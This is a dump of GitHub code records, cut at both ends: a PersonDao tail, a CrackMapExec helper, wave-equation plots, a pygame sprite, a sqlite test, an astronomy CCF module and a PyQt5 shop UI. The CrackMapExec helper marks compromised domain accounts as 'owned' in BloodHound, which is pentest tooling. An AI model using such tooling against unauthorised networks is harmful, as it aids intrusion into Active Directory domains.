"dao/PersonDao.py", "file_name": "PersonDao.py", "file_ext": "py", "file_size_in_byte": 2844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "model.Person.Person", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 21, "usage_type": "name"}, {"api_name": "model.Person.Person", "line_number": 21, "usage_type": "name"}, {"api_name": "model.Person.Person.get_by_id", "line_number": 36, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 34, "usage_type": "name"}, {"api_name": "model.Person.Person", "line_number": 34, "usage_type": "name"}, {"api_name": "model.Person.Person.select", "line_number": 44, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 44, "usage_type": "name"}, {"api_name": "model.Person.Person.last_name", "line_number": 44, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 42, "usage_type": "name"}, {"api_name": "model.Person.Person.select", "line_number": 56, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 56, "usage_type": "name"}, {"api_name": "model.Person.Person.last_name", "line_number": 56, "usage_type": "attribute"}, {"api_name": "model.Person.Person.first_name", "line_number": 57, "usage_type": "attribute"}, {"api_name": "model.Person.Person", "line_number": 57, "usage_type": "name"}, {"api_name": "model.Person.Person.patronymic", "line_number": 58, "usage_type": "attribute"}, {"api_name": "model.Person.Person", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 53, "usage_type": "name"}, {"api_name": "model.Person.Person.select", "line_number": 67, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 67, "usage_type": "name"}, {"api_name": "model.Person.Person.select", "line_number": 71, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 71, "usage_type": "name"}, {"api_name": "model.Person.database.execute", "line_number": 72, "usage_type": "call"}, {"api_name": "model.Person.database", "line_number": 72, "usage_type": "name"}, {"api_name": "model.Person.Person.get", "line_number": 88, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 88, "usage_type": "name"}, {"api_name": "model.Person.Person.face_id", "line_number": 88, "usage_type": "attribute"}]} +{"seq_id": "27360249441", "text": "def add_user_bh(user, domain, logger, config):\n users_owned = []\n if isinstance(user, str):\n users_owned.append({'username': user.upper(), 'domain': domain.upper()})\n else:\n users_owned = user\n if config.get('BloodHound', 'bh_enabled') != \"False\":\n try:\n from neo4j.v1 import GraphDatabase\n except:\n from neo4j import GraphDatabase\n from neo4j.exceptions import AuthError, ServiceUnavailable\n uri = \"bolt://{}:{}\".format(config.get('BloodHound', 'bh_uri'), config.get('BloodHound', 'bh_port'))\n\n driver = GraphDatabase.driver(uri, auth=(config.get('BloodHound', 'bh_user'), config.get('BloodHound', 'bh_pass')), encrypted=False)\n try:\n with driver.session() as session:\n with session.begin_transaction() as tx:\n for info in users_owned:\n if info['username'][-1] == '$':\n user_owned = info['username'][:-1] + \".\" + info['domain']\n account_type = 'Computer'\n else:\n user_owned = info['username'] + \"@\" + info['domain']\n account_type = 'User'\n\n result = tx.run(\n \"MATCH (c:{} {{name:\\\"{}\\\"}}) RETURN c\".format(account_type, user_owned))\n\n if result.data()[0]['c'].get('owned') in (False, None):\n logger.debug(\"MATCH (c:{} {{name:\\\"{}\\\"}}) SET c.owned=True RETURN c.name AS name\".format(account_type, user_owned))\n result = tx.run(\n \"MATCH (c:{} {{name:\\\"{}\\\"}}) SET c.owned=True RETURN c.name AS name\".format(account_type, user_owned))\n logger.highlight(\"Node {} successfully set as owned in BloodHound\".format(user_owned))\n except AuthError as e:\n logger.error(\n \"Provided Neo4J credentials ({}:{}) are not valid.\".format(config.get('BloodHound', 'bh_user'), config.get('BloodHound', 'bh_pass')))\n return\n except ServiceUnavailable as e:\n logger.error(\"Neo4J does not seem to be available on {}.\".format(uri))\n return\n except Exception as e:\n logger.error(\"Unexpected error with Neo4J\")\n logger.error(\"Account not found on the domain\")\n return\n driver.close()", "repo_name": "merlinepedra25/CrackMapExec", "sub_path": "cme/helpers/bloodhound.py", "file_name": "bloodhound.py", "file_ext": "py", "file_size_in_byte": 2451, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "neo4j.GraphDatabase.driver", "line_number": 15, "usage_type": "call"}, {"api_name": "neo4j.GraphDatabase", "line_number": 15, "usage_type": "name"}, {"api_name": "neo4j.exceptions.AuthError", "line_number": 35, "usage_type": "name"}, {"api_name": "neo4j.exceptions.ServiceUnavailable", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "8590604973", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTests and Plotting for the Projektparktikum on Wave Equation\n\nFor Animations use >>%matplotlib qt<< in console or Tools>Preferences>IPython console>Graphics>Backend: Qt\n\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom wave_equation_functionsb import *\nfrom matplotlib.animation import FuncAnimation\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# set input\n\nalpha = 0.5 # Currant Number should be less than 1\nboundaries = 'o3'\n\n# initialize grid\nNx = 800\nxstart = -5\nxend = 5\ndx = (xend - xstart) / (Nx)\n# avoid zeros Avoid common multiples with transcendent factor 1/pi\nx = np.linspace(xstart + dx / np.pi, xend + dx / np.pi, Nx + 1)\n\nperiods = 2\n\n# create array with initial values, i.e. choose a function\nphi0 = gaussian(x, 0, 2)\n# phi0 = sine(x,2)\n# phi0 = pulse(x,1,10)\npi0 = np.zeros_like(x)\n\n# call function\noutput, x, t = waveeq(phi0, pi0, x, periods, alpha, boundaries, outputstep=1)\n\nphi = output[:, 0, :]\npi = output[:, 1, :]\n\n'''\nPlotting functions\n\n1: heatmap of field phi over x and t \n\n2: snapshot of phi and Pi at timestep 'plotstep'\n\n3: animation\n\n'''\n\n########################\n# 1 plot at time slice #\n########################\n\n# plotstep=10 #direct timestep input\nplotstep = round(0.23 * len(output[0, 0, :])) # percentage of total time evolution\nphimax = np.max(abs(phi[:, plotstep]))\npimax = np.max(abs(pi[:, plotstep]))\nallmax = np.max([abs(phi[:, plotstep]), abs(pi[:, plotstep])])\n\nfig2, ax2 = plt.subplots(figsize=(12, 8))\n\nax2.set_title('$\\phi$ and $\\Pi$ at timestep %i' % (plotstep))\nax2.set_xlabel('x')\nax2.set_ylabel('field amplitude $\\phi$ [a.u.]', color='r')\nax2.set_xlim([xstart, xend])\nax2.set_ylim([-1.1 * allmax, 1.1 * allmax])\nax2.grid(True)\nl1 = ax2.plot(x, phi[:, plotstep], 'r-', label='$\\phi$')\n\nax3 = ax2.twinx()\n\nax3.set_ylabel('field amplitude $\\Pi$ [a.u.]', color='b')\n# ax3.set_ylim([-1.1*pimax,1.1*pimax])\nax3.set_ylim([-1.1 * allmax, 1.1 * allmax])\n# ax3.set_yticks(np.linspace(ax3.get_yticks()[0], ax3.get_yticks()[-1], len(ax2.get_yticks()))) # put -2 no of steps if grids are not aligned\nax3.grid(False)\n\nl2 = ax3.plot(x, pi[:, plotstep], 'b-', label='$\\Pi$')\n\n# complicated legend due to double axis\nlns = l1 + l2\nlabs = [l.get_label() for l in lns]\nax2.legend(lns, labs, loc='upper left')\n\nfig2.tight_layout()\n\n# plt.savefig('timeslices.png', dpi=300)\nplt.show()\n\n#############\n# 2 heatmap #\n#############\n\nfig, ax = plt.subplots()\nim = ax.pcolormesh(x, t, output[:, 0, 1:].T, vmin=-phimax, vmax=phimax, cmap='RdBu')\nax.set_title('field amplitude $\\phi$ [a.u.]')\nax.set_xlabel('x [a.u.]')\nax.set_ylabel('$n_t$ [a.u.]')\nfig.colorbar(im, ax=ax)\nplt.show()\n\n###############\n# 3 animation #\n###############\n# uses steps from https://brushingupscience.com/2016/06/21/matplotlib-animations-the-easy-way/\n\nplt.style.use('seaborn-pastel')\n\nfig, ax = plt.subplots(figsize=(5, 3))\nax.set(xlim=(-5.5, 5.5), ylim=(-1.5, 1.5))\nax.set_yticklabels([])\nax.set_xticklabels([])\nax.tick_params(axis='both', which='both', left=False, right=False, bottom=False, top=False, labelbottom=False)\n\nline1 = ax.plot(x, phi[:, 0], color='r', lw=2)[0]\nline2 = ax.plot(x, pi[:, 0], color='b', lw=2)[0]\n\n\ndef animate(i):\n line1.set_ydata(phi[:, i])\n line2.set_ydata(pi[:, i])\n\n\nanim = FuncAnimation(fig, animate, interval=10, frames=len(t), repeat_delay=500)\n# anim.save('anime.gif')\nplt.draw()\nplt.show()\n\n'''\n################\n# 4 seismogram #\n################\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\nskip = 30\nX = t[::int(Nt/skip)+1]\nY = x\nX,Y = np.meshgrid(X,Y)\n\nZ = np.zeros((Nx,skip))\n\nfor i in range(skip):\n Z[:,i] = phi[:,i*int(Nt/skip)]\nax.plot_surface(X, Y, Z, rstride=1, cstride=1, facecolor='w', color='w', shade=False, lw=.5)\n\n#ax.set_zlim(0, 5)\n#ax.set_xlim(-51, 51)\nax.set_zlabel(\"Intensity\")\nax.view_init(30,200) # hight, rotation in deg\nplt.show()\n'''", "repo_name": "vsevolodnedora/WaveEqutionPrj", "sub_path": "other/old_stuff/wave_equation_plotting.py", "file_name": "wave_equation_plotting.py", "file_ext": "py", "file_size_in_byte": 3920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 109, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}]} +{"seq_id": "31483820467", "text": "import pygame\nfrom pygame.sprite import Sprite\n\n\n\nclass HP(Sprite):\n def __init__(self,ai_settings,screen):\n \"初始化血量\"\n super().__init__()\n\n self.screen = screen\n self.ai_settings = ai_settings\n\n # 加载血条图像\n self.image_100 = pygame.image.load(\"images\\hp_full.png\")\n self.image_70 = pygame.image.load(\"images\\hp_70.png\")\n self.image_50 = pygame.image.load(\"images\\hp_50.png\")\n self.image_30 = pygame.image.load(\"images\\hp_30.png\")\n self.rect = self.image_100.get_rect()\n self.screen_rect = screen.get_rect()\n\n #放置血条\n self.rect.centerx = 50\n self.rect.bottom = 90\n\n def blitme(self):\n \"\"\"在指定位置绘制血条\"\"\"\n if self.ai_settings.ship_hp/self.ai_settings.ship_max_hp == 1:\n self.screen.blit(self.image_100, self.rect)\n elif self.ai_settings.ship_hp/self.ai_settings.ship_max_hp >= 0.7:\n self.screen.blit(self.image_70, self.rect)\n elif self.ai_settings.ship_hp/self.ai_settings.ship_max_hp >= 0.5:\n self.screen.blit(self.image_50, self.rect)\n else:\n self.screen.blit(self.image_30, self.rect)\n", "repo_name": "aba2222/alien_invasion_game", "sub_path": "health_point.py", "file_name": "health_point.py", "file_ext": "py", "file_size_in_byte": 1210, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.sprite.Sprite", "line_number": 6, "usage_type": "name"}, {"api_name": "pygame.image.load", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}]} +{"seq_id": "22885065909", "text": "# -*- coding: utf-8 -*-\nimport sqlite3\n# import unicode\nimport sys\n\nconn = sqlite3.connect('test.db')\nconn.text_factory=str\nc = conn.cursor()\nc.execute(\"SELECT * from 测试双一流\")\n\nfor row in c:\n print(\"ID = \", row[0])\n print(\"NAME = \", str(row[1]).encode('utf-8'))\n print(\"ADDRESS = \", str(row[2]).encode('gbk'))\n print(\"SALARY = \", row[3], \"\\n\")\n\nconn.close()", "repo_name": "thorweiyan/curlGaoXiaoShuJu", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 375, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "8117778286", "text": "from collections import Iterable\n\nimport numpy as np\nfrom os.path import basename\nimport math\nimport warnings\nfrom astropy.io import fits\nfrom cached_property import cached_property\n\nfrom .gaussian import gauss, gaussfit, FWHM as FWHMcalc, RV, RVerror, contrast\nfrom .bisector import BIS, BIS_HARPS as BIS_HARPS_calc\nfrom .vspan import vspan\nfrom .wspan import wspan\nfrom .keywords import getRVarray, getBJD\nfrom . import writers\n\n\nEPS = 1e-5 # all indicators are accurate up to this epsilon\nnEPS = abs(math.floor(math.log(EPS, 10))) # number of decimals for output\n\n\ndef rdb_names(names):\n \"\"\" Return the usual .rdb format names. \"\"\"\n r = []\n for name in names:\n if name.lower() in ('rv', 'vrad', 'radvel'):\n r.append('vrad')\n elif name.lower() in ('rve', 'svrad', 'error', 'err'):\n r.append('svrad')\n elif name.lower() in ('fwhm'):\n r.append('fwhm')\n elif name.lower() in ('bis', 'bisspan', 'bis_span'):\n r.append('bis_span')\n elif name.lower() in ('contrast'):\n r.append('contrast')\n else:\n r.append(name)\n return r\n\n\nclass Indicators:\n \"\"\" Class to hold CCF indicators \"\"\"\n def __init__(self, rv, ccf, RV_on=True, FWHM_on=True, BIS_on=True,\n Vspan_on=True, Wspan_on=True, contrast_on=True,\n BIS_HARPS=False):\n \"\"\"\n The default constructor takes `rv` and `ccf` arrays as input, see\n `Indicators.from_file` for another way to create the object from a CCF\n fits file. Keyword parameters turn specific indicators on or off.\n Is `BIS_HARPS` is True, the BIS is calculated using the same routine as\n in the HARPS pipeline.\n \"\"\"\n self.rv = rv\n self.ccf = ccf\n self.filename = None\n self.on_indicators = []\n if RV_on: \n self.on_indicators.append('RV')\n self.on_indicators.append('RVerror')\n if FWHM_on: self.on_indicators.append('FWHM')\n if contrast_on: self.on_indicators.append('contrast')\n if BIS_on: self.on_indicators.append('BIS')\n if Vspan_on: self.on_indicators.append('Vspan')\n if Wspan_on: self.on_indicators.append('Wspan')\n self.on_indicators_rdb = rdb_names(self.on_indicators)\n\n self._use_bis_from_HARPS = BIS_HARPS\n\n self._EPS = EPS\n self._nEPS = nEPS\n\n def __repr__(self):\n if self.filename is None:\n r = f'CCFindicators(RVmin={self.rv.min()}; '\\\n f'RVmax={self.rv.max()}; size={self.rv.size})'\n else:\n r = f'CCFindicators(CCF from {basename(self.filename)})'\n return r\n\n @classmethod\n def from_file(cls, filename, hdu_number=0, data_index=-1, **kwargs):\n \"\"\" \n Create an `Indicators` object from one or more fits files.\n \n Parameters\n ----------\n filename : str or list of str\n The name(s) of the fits file(s)\n hdu_number : int, default = 0\n The index of the HDU list which contains the CCF\n data_index : int, default = -1\n The index of the .data array which contains the CCF. The data will \n be accessed as ccf = HDU[hdu_number].data[data_index,:]\n \"\"\"\n if isinstance(filename, Iterable) and not isinstance(filename, str):\n # list of files\n N = len(filename)\n rv, ccf = [], []\n for i in range(N):\n f = filename[i]\n rv.append(getRVarray(f))\n hdul = fits.open(f)\n ccf.append(hdul[hdu_number].data[data_index, :])\n\n if isinstance(filename, str):\n # one file only\n rv = getRVarray(filename)\n hdul = fits.open(filename)\n ccf = hdul[hdu_number].data[data_index, :]\n else:\n raise ValueError(\n 'Input to `from_file` should be a string or list of strings.')\n\n I = cls(rv, ccf, **kwargs)\n I.filename = filename\n I.HDU = hdul\n\n return I\n\n @cached_property\n def RV(self):\n return RV(self.rv, self.ccf)\n\n @cached_property\n def RVerror(self):\n try:\n eccf = self.HDU[2].data[-1,:] # for ESPRESSO\n except Exception as e:\n warnings.warn(e)\n warnings.warn('Cannot access CCF uncertainties, using 1.0.')\n eccf = np.ones_like(self.rv)\n finally:\n return RVerror(self.rv, self.ccf, eccf)\n\n\n @cached_property\n def FWHM(self):\n return FWHMcalc(self.rv, self.ccf)\n\n @cached_property\n def BIS(self):\n if self._use_bis_from_HARPS:\n return BIS_HARPS_calc(self.rv, self.ccf)\n else:\n return BIS(self.rv, self.ccf)\n\n @cached_property\n def Vspan(self):\n return vspan(self.rv, self.ccf)\n\n @cached_property\n def Wspan(self):\n return wspan(self.rv, self.ccf)\n\n @cached_property\n def contrast(self):\n return contrast(self.rv, self.ccf)\n\n @property\n def all(self):\n return tuple(self.__getattribute__(i) for i in self.on_indicators)\n\n def to_dict(self):\n return writers.to_dict(self)\n \n def to_rdb(self, filename='stdout', clobber=False):\n return writers.to_rdb(self, filename, clobber)\n\ndef indicators_from_files(files, rdb_format=True, show=True, show_bjd=True,\n sort_bjd=True, **kwargs):\n\n if sort_bjd:\n files = sorted(files, key=getBJD)\n\n for j, f in enumerate(files):\n if show_bjd:\n bjd = getBJD(f)\n\n I = Indicators.from_file(f, **kwargs)\n if j == 0 and show:\n if rdb_format:\n lst = (['jdb'] + I.on_indicators_rdb) if show_bjd \\\n else I.on_indicators_rdb\n print('\\t'.join(lst))\n print('\\t'.join([len(s) * '-' for s in lst]))\n else:\n if show_bjd:\n print(['jdb'] + I.on_indicators)\n else:\n print(I.on_indicators)\n\n if rdb_format:\n print(\n '\\t'.join([f'{bjd:<.6f}'] + [f'{ind:<.5f}' for ind in I.all]))\n else:\n print((bjd, ) + I.all)\n", "repo_name": "MahmoudOshagh/iCCF", "sub_path": "iCCF/iCCF.py", "file_name": "iCCF.py", "file_ext": "py", "file_size_in_byte": 6237, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.floor", "line_number": 19, "usage_type": "call"}, {"api_name": "math.log", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 77, "usage_type": "call"}, {"api_name": "collections.Iterable", "line_number": 95, "usage_type": "argument"}, {"api_name": "keywords.getRVarray", "line_number": 101, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 102, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 102, "usage_type": "name"}, {"api_name": "keywords.getRVarray", "line_number": 107, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 108, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 108, "usage_type": "name"}, {"api_name": "gaussian.RV", "line_number": 122, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 120, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 129, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 131, "usage_type": "call"}, {"api_name": "gaussian.RVerror", "line_number": 133, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 124, "usage_type": "name"}, {"api_name": "gaussian.FWHM", "line_number": 138, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 136, "usage_type": "name"}, {"api_name": "bisector.BIS_HARPS", "line_number": 143, "usage_type": "call"}, {"api_name": "bisector.BIS", "line_number": 145, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 140, "usage_type": "name"}, {"api_name": "vspan.vspan", "line_number": 149, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 147, "usage_type": "name"}, {"api_name": "wspan.wspan", "line_number": 153, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 151, "usage_type": "name"}, {"api_name": "gaussian.contrast", "line_number": 157, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 155, "usage_type": "name"}, {"api_name": "keywords.getBJD", "line_number": 173, "usage_type": "name"}, {"api_name": "keywords.getBJD", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "5522512198", "text": "from PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_mainWindow(object):\r\n def setupUi(self, mainWindow):\r\n mainWindow.setObjectName(\"mainWindow\")\r\n mainWindow.resize(500, 750)\r\n \r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(mainWindow.sizePolicy().hasHeightForWidth())\r\n mainWindow.setSizePolicy(sizePolicy)\r\n mainWindow.setMinimumSize(QtCore.QSize(500, 750))\r\n mainWindow.setMaximumSize(QtCore.QSize(500, 750))\r\n \r\n self.centralwidget = QtWidgets.QWidget(mainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.mainLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.mainLabel.setGeometry(QtCore.QRect(175, 30, 150, 30))\r\n \r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n \r\n self.mainLabel.setFont(font)\r\n self.mainLabel.setScaledContents(False)\r\n self.mainLabel.setAlignment(QtCore.Qt.AlignCenter)\r\n self.mainLabel.setObjectName(\"mainLabel\")\r\n \r\n self.shopButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.shopButton.setGeometry(QtCore.QRect(200, 150, 100, 40))\r\n self.shopButton.setObjectName(\"shopButton\")\r\n \r\n self.doneButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.doneButton.setGeometry(QtCore.QRect(375, 645, 100, 40))\r\n self.doneButton.setObjectName(\"doneButton\")\r\n \r\n self.resetButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.resetButton.setGeometry(QtCore.QRect(25, 645, 100, 40))\r\n self.resetButton.setObjectName(\"resetButton\")\r\n \r\n self.cartButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.cartButton.setGeometry(QtCore.QRect(200, 250, 100, 40))\r\n self.cartButton.setObjectName(\"cartButton\")\r\n \r\n self.outputLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.outputLabel.setGeometry(QtCore.QRect(50, 475, 400, 150))\r\n self.outputLabel.setObjectName(\"outputLabel\")\r\n \r\n self.cookieQuantity = QtWidgets.QTextEdit(self.centralwidget)\r\n self.cookieQuantity.setGeometry(QtCore.QRect(270, 150, 60, 40))\r\n self.cookieQuantity.setFont(font)\r\n self.cookieQuantity.setObjectName(\"cookieQuantity\")\r\n \r\n self.sandwichQuantity = QtWidgets.QTextEdit(self.centralwidget)\r\n self.sandwichQuantity.setGeometry(QtCore.QRect(270, 250, 60, 40))\r\n self.sandwichQuantity.setFont(font)\r\n self.sandwichQuantity.setObjectName(\"sandwichQuantity\")\r\n \r\n self.waterQuantity = QtWidgets.QTextEdit(self.centralwidget)\r\n self.waterQuantity.setGeometry(QtCore.QRect(270, 350, 60, 40))\r\n self.waterQuantity.setFont(font)\r\n self.waterQuantity.setObjectName(\"waterQuantity\")\r\n \r\n self.cookieButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.cookieButton.setGeometry(QtCore.QRect(350, 150, 100, 40))\r\n self.cookieButton.setObjectName(\"cookieButton\")\r\n \r\n self.sandwichButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.sandwichButton.setGeometry(QtCore.QRect(350, 250, 100, 40))\r\n self.sandwichButton.setObjectName(\"sandwichButton\")\r\n \r\n self.waterButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.waterButton.setGeometry(QtCore.QRect(350, 350, 100, 40))\r\n self.waterButton.setObjectName(\"waterButton\")\r\n \r\n font.setPointSize(12)\r\n \r\n self.cookieLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.cookieLabel.setGeometry(QtCore.QRect(40, 150, 130, 40))\r\n self.cookieLabel.setFont(font)\r\n self.cookieLabel.setObjectName(\"cookieLabel\")\r\n \r\n self.sandwichLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.sandwichLabel.setGeometry(QtCore.QRect(40, 250, 150, 40))\r\n self.sandwichLabel.setFont(font)\r\n self.sandwichLabel.setObjectName(\"sandwichLabel\")\r\n \r\n self.waterLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.waterLabel.setGeometry(QtCore.QRect(40, 350, 150, 40))\r\n self.waterLabel.setFont(font)\r\n self.waterLabel.setObjectName(\"waterLabel\")\r\n \r\n mainWindow.setCentralWidget(self.centralwidget)\r\n self.menubar = QtWidgets.QMenuBar(mainWindow)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 500, 20))\r\n self.menubar.setObjectName(\"menubar\")\r\n mainWindow.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(mainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n mainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(mainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(mainWindow)\r\n\r\n def retranslateUi(self, mainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n mainWindow.setWindowTitle(_translate(\"mainWindow\", \"Michael\\'s Shop\"))\r\n self.mainLabel.setText(_translate(\"mainWindow\", \"Main Menu\"))\r\n self.shopButton.setText(_translate(\"mainWindow\", \"Shop!\"))\r\n self.doneButton.setText(_translate(\"mainWindow\", \"Done\"))\r\n self.resetButton.setText(_translate(\"mainWindow\", \"Reset Cart\"))\r\n self.cartButton.setText(_translate(\"mainWindow\", \"View Cart\"))\r\n self.outputLabel.setText(_translate(\"mainWindow\", \"\"))\r\n self.cookieQuantity.setText(_translate(\"mainWindow\", '1'))\r\n self.sandwichQuantity.setText(_translate(\"mainWindow\", '1'))\r\n self.waterQuantity.setText(_translate(\"mainWindow\", '1'))\r\n self.cookieButton.setText(_translate(\"mainWindow\", \"Add to cart\"))\r\n self.sandwichButton.setText(_translate(\"mainWindow\", \"Add to cart\"))\r\n self.waterButton.setText(_translate(\"mainWindow\", \"Add to cart\"))\r\n self.cookieLabel.setText(_translate(\"mainWindow\", \"Cookie - $1.50 ea\"))\r\n self.sandwichLabel.setText(_translate(\"mainWindow\", \"Sandwich - $1.50 ea\"))\r\n self.waterLabel.setText(_translate(\"mainWindow\", \"Water - $1.50 ea\"))\r\n", "repo_name": "seorsum1/Project-1", "sub_path": "mainUI.py", "file_name": "mainUI.py", "file_ext": "py", "file_size_in_byte": 6186, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QSizePolicy", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 15, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 17, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 20, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 27, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 27, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 30, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 34, "usage_type": "name"}, {"api_name": 